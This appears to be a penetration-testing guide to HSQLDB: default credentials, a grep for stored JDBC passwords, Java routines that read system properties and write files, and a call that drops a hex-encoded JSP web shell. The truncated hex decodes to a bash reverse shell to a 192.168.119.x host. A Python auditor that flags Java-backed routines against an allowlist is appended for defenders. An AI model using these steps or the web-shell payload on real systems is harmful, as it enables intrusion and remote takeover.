Basic Information
HSQLDB (HyperSQL DataBase) is the leading SQL relational database system written in Java. It offers a small, fast, multithreaded and transactional database engine with in-memory and disk-based tables, and supports embedded and server modes.
Default port: 9001
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
Information
Default Settings
Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.
Default credentials are usually sa with a blank password.
If you have exploited another service, search for possible credentials using
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
Note the database name carefully - you’ll need it to connect.
Info Gathering
Connect to the DB instance by downloading HSQLDB and extracting hsqldb/lib/hsqldb.jar. Run the GUI app (eww) using java -jar hsqldb.jar and connect to the instance using the discovered/weak credentials.
Note the connection URL will look something like this for a remote system: jdbc:hsqldb:hsql://ip/DBNAME.
Tricks
Java Language Routines
We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.
JRTs can be functions or procedures. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the VALUES statement.
If the Java method we want to call returns void, we need to use a procedure invoked with the CALL statement.
Reading Java System Properties
Create function:
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
Execute function:
VALUES(getsystemproperty('user.name'))
You can find a list of system properties here.
Write Content to File
You can use the com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename Java gadget located in the JDK (auto loaded into the class path of the application) to write hex-encoded items to disk via a custom procedure. Note the maximum size of 1024 bytes.
Create procedure:
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
Execute procedure:
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
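From the defender's side, the routine definitions in this section leave a recognisable trace in the database's DDL. The following added example (not part of the original page) scans SQL text for Java-backed routines and flags any bound to a class outside an allowlist. The allowlist format is modelled on HSQLDB's hsqldb.method_class_names system property; the benign routines and the org.example.app policy entry are constructed for illustration.

```python
import re

# Start of any routine definition, and the Java binding clause used on this page.
START_RE = re.compile(r"\bCREATE\s+(FUNCTION|PROCEDURE)\s+([\w.\"]+)", re.I)
EXT_RE = re.compile(r"\bEXTERNAL\s+NAME\s+'CLASSPATH:([\w.$]+)\.([\w$]+)'", re.I)

def class_allowed(cls, allowlist):
    """allowlist: 'a.B;c.d.*' (exact class names, or package wildcards ending in .*)."""
    for entry in filter(None, (e.strip() for e in allowlist.split(";"))):
        if entry.endswith(".*"):
            if cls.startswith(entry[:-1]):  # keep the dot: org.app.* must not match org.apple.X
                return True
        elif cls == entry:
            return True
    return False

def audit_routines(sql_text, allowlist):
    """Return one finding per Java-backed routine; SQL-bodied routines are skipped."""
    starts = list(START_RE.finditer(sql_text))
    findings = []
    for i, m in enumerate(starts):
        # Only look for the binding inside this statement, not in the next routine.
        end = starts[i + 1].start() if i + 1 < len(starts) else len(sql_text)
        ext = EXT_RE.search(sql_text, m.end(), end)
        if ext:
            cls, method = ext.groups()
            findings.append({"kind": m.group(1).upper(), "routine": m.group(2),
                             "class": cls, "method": method,
                             "allowed": class_allowed(cls, allowlist)})
    return findings

# Constructed sample: the two definitions from this page plus two benign ones.
SAMPLE_DDL = """
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty';
CREATE FUNCTION an_hour_before(t TIMESTAMP) RETURNS TIMESTAMP RETURN t - 1 HOUR;
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename';
CREATE FUNCTION absval(IN x INT) RETURNS INT LANGUAGE JAVA DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.Math.abs';
"""
SAMPLE_ALLOWLIST = "java.lang.Math;org.example.app.*"  # hypothetical policy

if __name__ == "__main__":
    for f in audit_routines(SAMPLE_DDL, SAMPLE_ALLOWLIST):
        print("ok   " if f["allowed"] else "ALERT", f["kind"], f["routine"], "->",
              f["class"] + "." + f["method"])
```

Run it against a schema export or the database's persisted DDL; any routine reported as not allowed is worth reviewing alongside who created it.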